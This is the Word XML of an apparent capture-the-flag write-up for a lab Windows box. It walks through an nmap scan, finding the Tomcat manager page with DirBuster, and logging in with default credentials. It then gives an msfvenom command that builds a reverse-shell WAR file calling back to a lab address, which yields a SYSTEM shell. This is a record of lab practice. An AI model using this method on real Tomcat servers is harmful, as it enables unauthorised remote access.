              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8742A6" w14:textId="377BE954" w:rsidR="00CB3015" w:rsidRDefault="00583DB6" w:rsidP="00583DB6">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc169526777"/>
      <w:r w:rsidRPr="00583DB6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00583DB6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F85552">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00583DB6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00583DB6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00583DB6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> scan results</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="48BA3A34" w14:textId="36940640" w:rsidR="00D265A3" w:rsidRDefault="00583DB6" w:rsidP="00060C0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Only open port is 8080. There is a web application running on this port. Sadly, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> didn’t provide any OS information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCA4B44" w14:textId="287FE76D" w:rsidR="00D265A3" w:rsidRDefault="00D265A3" w:rsidP="00D265A3">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc169526771"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Initial foothold</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="592554D6" w14:textId="63B30535" w:rsidR="00D265A3" w:rsidRDefault="00583DB6" w:rsidP="00D265A3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Since I have only one port open, I try to analyze the web application on it. However, any web application is deployed and I found the Apache Tomcat default page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3941A5" w14:textId="77777777" w:rsidR="00583DB6" w:rsidRDefault="00583DB6" w:rsidP="00583DB6">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E362779" wp14:editId="16CA986F">
            <wp:extent cx="6120130" cy="3125470"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="131858024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80242" name="Immagine 131858024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3125470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="622D3052" w14:textId="69753C22" w:rsidR="00D265A3" w:rsidRDefault="00583DB6" w:rsidP="00583DB6">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc169526778"/>
      <w:r w:rsidRPr="00583DB6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00583DB6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F85552">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00583DB6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Apache Tomcat default page</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="727CE0F9" w14:textId="144DFFE5" w:rsidR="00D265A3" w:rsidRDefault="00583DB6" w:rsidP="00D265A3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00583DB6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>So, I n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">eed something else to exploit this box. I run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DirBuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and I found a manager page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C90582" w14:textId="77777777" w:rsidR="00583DB6" w:rsidRDefault="00583DB6" w:rsidP="00583DB6">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69FA4C34" wp14:editId="338270EF">
            <wp:extent cx="6120130" cy="2442210"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="88802783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27832" name="Immagine 888027832"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="2442210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C78A69F" w14:textId="46D465E1" w:rsidR="00583DB6" w:rsidRDefault="00583DB6" w:rsidP="00583DB6">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc169526779"/>
      <w:r w:rsidRPr="00583DB6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00583DB6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F85552">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00583DB6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00583DB6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DirBuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00583DB6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> search results</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="32AC37E7" w14:textId="108CC7B6" w:rsidR="00D265A3" w:rsidRPr="00583DB6" w:rsidRDefault="00D265A3" w:rsidP="00D265A3">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc169526772"/>
      <w:r w:rsidRPr="00583DB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>User flag</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="4FFDD6C6" w14:textId="50FEF2FE" w:rsidR="00D265A3" w:rsidRDefault="00583DB6" w:rsidP="00D265A3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>At this point I tried to access to this manager page, but it requires a login. So, I searched on the Internet the default credential for this Apache Tomcat version and luckily them worked! The manager page is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8F89A1" w14:textId="77777777" w:rsidR="00583DB6" w:rsidRDefault="00583DB6" w:rsidP="00583DB6">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D57DEF0" wp14:editId="42782906">
            <wp:extent cx="6120130" cy="2736215"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="1744156230"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56230" name="Immagine 17441562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2736215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="622217FB" w14:textId="33A65350" w:rsidR="00583DB6" w:rsidRPr="00583DB6" w:rsidRDefault="00583DB6" w:rsidP="00583DB6">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc169526780"/>
      <w:r w:rsidRPr="00583DB6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00583DB6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F85552">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00583DB6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Apache Tomcat manager page</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="2C34E53E" w14:textId="06DF404A" w:rsidR="00D265A3" w:rsidRDefault="00583DB6" w:rsidP="00D265A3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This page allows me to upload a </w:t>
      </w:r>
      <w:r w:rsidRPr="00583DB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.war</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> file. So, I created a malicious one using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00583DB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> running the command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7488E2F8" w14:textId="217106E5" w:rsidR="00583DB6" w:rsidRPr="00583DB6" w:rsidRDefault="00F85552" w:rsidP="00D265A3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <m:oMathPara>
        <m:oMath>
          <m:r>
            <w:rPr>
              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <m:t>msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.9 LPORT=6789 -f war -o revshell.war</m:t>
          </m:r>
        </m:oMath>
      </m:oMathPara>
    </w:p>
    <w:p w14:paraId="58B7C6B9" w14:textId="33D10C78" w:rsidR="00D265A3" w:rsidRDefault="00F85552" w:rsidP="00D265A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">At this point I uploaded this malicious file, opened a listener on my Kali machine and invoked the malicious application. In this way, I obtained a reverse shell. Unpredictable, I already was </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>NT AUTHORITY\SYSTEM</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667F616D" w14:textId="77777777" w:rsidR="00F85552" w:rsidRDefault="00F85552" w:rsidP="00F85552">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2411C90A" wp14:editId="44F4BA10">
            <wp:extent cx="5142857" cy="1733333"/>
            <wp:effectExtent l="0" t="0" r="1270" b="635"/>
            <wp:docPr id="201081762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817621" name="Immagine 2010817621"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5142857" cy="1733333"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F947C06" w14:textId="58062336" w:rsidR="00F85552" w:rsidRPr="00F85552" w:rsidRDefault="00F85552" w:rsidP="00F85552">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc169526781"/>
      <w:r w:rsidRPr="00F85552">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00F85552">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00F85552">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Root shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="6C81B9B0" w14:textId="17FAE3F9" w:rsidR="00F85552" w:rsidRPr="00F85552" w:rsidRDefault="00F85552" w:rsidP="00F85552">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>All I need to do was retrieving the user and root flags (I forgot flags screen, sorry).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2891A773" w14:textId="2E9A9447" w:rsidR="00D265A3" w:rsidRPr="00CB3015" w:rsidRDefault="00D265A3" w:rsidP="00D265A3">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc169526773"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Privilege escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="112737BA" w14:textId="4707C6D3" w:rsidR="00D265A3" w:rsidRPr="00D265A3" w:rsidRDefault="00583DB6" w:rsidP="00D265A3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">I didn’t need to elevate my privileges due to I obtained a shell as </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>NT AUTHORITY\SYSTEM</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> yet and I had already retrieved the root flag too.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29295B9C" w14:textId="77777777" w:rsidR="00D265A3" w:rsidRPr="00D265A3" w:rsidRDefault="00D265A3" w:rsidP="00D265A3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D802752" w14:textId="77777777" w:rsidR="00D265A3" w:rsidRPr="00CB3015" w:rsidRDefault="00D265A3" w:rsidP="00060C0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00D265A3" w:rsidRPr="00CB301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844C3"/>
    <w:rsid w:val="001409A8"/>
    <w:rsid w:val="00253185"/>
    <w:rsid w:val="003E7890"/>
    <w:rsid w:val="004917A9"/>
    <w:rsid w:val="004E245C"/>
    <w:rsid w:val="00507AF9"/>
    <w:rsid w:val="005702DD"/>
    <w:rsid w:val="00583DB6"/>
    <w:rsid w:val="005D07C6"/>
    <w:rsid w:val="006D481D"/>
    <w:rsid w:val="006F4E0C"/>
    <w:rsid w:val="008F0C16"/>
    <w:rsid w:val="00915D60"/>
    <w:rsid w:val="009A4998"/>
    <w:rsid w:val="009C6F24"/>
    <w:rsid w:val="00A84B06"/>
    <w:rsid w:val="00AC7714"/>
    <w:rsid w:val="00AE7EC9"/>
    <w:rsid w:val="00BC3B9E"/>
    <w:rsid w:val="00C70811"/>
    <w:rsid w:val="00CB3015"/>
    <w:rsid w:val="00CD62ED"/>
    <w:rsid w:val="00D265A3"/>
    <w:rsid w:val="00DF72E4"/>
    <w:rsid w:val="00E11AAF"/>
    <w:rsid w:val="00EF34C6"/>
    <w:rsid w:val="00F85552"/>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506</Words>
  <Characters>2890</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3</cp:revision>
  <cp:lastPrinted>2024-06-17T04:26:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-17T04:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-17T04:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>